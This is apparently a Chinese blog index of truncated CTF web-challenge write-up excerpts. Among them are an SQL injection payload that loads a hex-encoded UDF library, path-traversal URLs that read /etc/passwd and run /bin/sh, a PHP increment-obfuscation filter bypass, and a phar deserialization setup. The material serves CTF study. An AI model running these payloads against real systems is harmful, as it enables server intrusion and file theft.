摘要:
可以看到如果是amdin用户可以执行date指令,而date指令可以suid提权读取文件 首先看注册过程 邮箱不能和管理员邮箱一样防止覆盖,让后id位数有限制,后面在数据库中可以发现判断是否是管理员用户正是看邮箱是不是admin@cscg.de和id是否大于900000,对于id注册是用1e10科学 阅读全文
摘要:
比赛比较简单,只做web,也是ak了。 where-are-the-cookies 查看robots.txt cookie是no的base64编码,改成yes的base64即可 why-are-types-weird password为 sha1('aaroZmOk') //0e6650701996 阅读全文
摘要:
if (window.debug?.extension) { let res = await fetch(window.debug?.extension.toString()); extension = await res.json(); } 对于这题第一个点就是如何通过这个判断。题目有个地方可以插 阅读全文
摘要:
www.zip下载源码 看源码 传入两个参数c和m,然后创建新的c类,执行c类的m函数 没有的类通过autoload调用,限定目录和后缀 默认给三个类能调用,看主要的file类 有一个getfile函数,能够调用和重写内容,但是内容我们没法指定 注意有三个类有一个pop链 <?php class U 阅读全文
摘要:
PHP session 存储方式 php_serialize 经过 serialize() 函数序列化数组 a:1:{s:4:“name”;s:5:“ocean”;} php(默认) 键名 竖线 经过 serialize() 函数处理的值 name|s:5:“ocean”; php_binary 键 阅读全文
摘要:
时间注入拿到admin密码登入,根据sql逻辑构造udf上传,再通过curl提权查看flag payload: -1';create table zzz (c BLOB);INSERT INTO zzz values(unhex('7F454C4602010100000000000000000003 阅读全文
摘要:
poc读取 /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd poc读取执行 /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id' 阅读全文
摘要:
传入$password进行查询,获取查询结果中的password和传入的$password进行比较,如果password能知道直接登入即可,否则只能尝试注入 尝试1' or 1=1#,注意到有过滤,在尝试构造 '^0# 提示password,因为这里获取的正确password会和传入的: '^0# 阅读全文
摘要:
过滤了异或取反构造,这里用自增 $_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__+ 阅读全文
摘要:
phar://是一种伪协议,个人感觉是用来打包的,可以用它获取打包的文件 注意url,类似文件包含,改成index试试 推测是再后面加上.php再进行文件读取 注意不仅能传图片也能传压缩包,我们目的是执行成php,这里用的phar进行打包 <?php $phar = new Phar("phar.p 阅读全文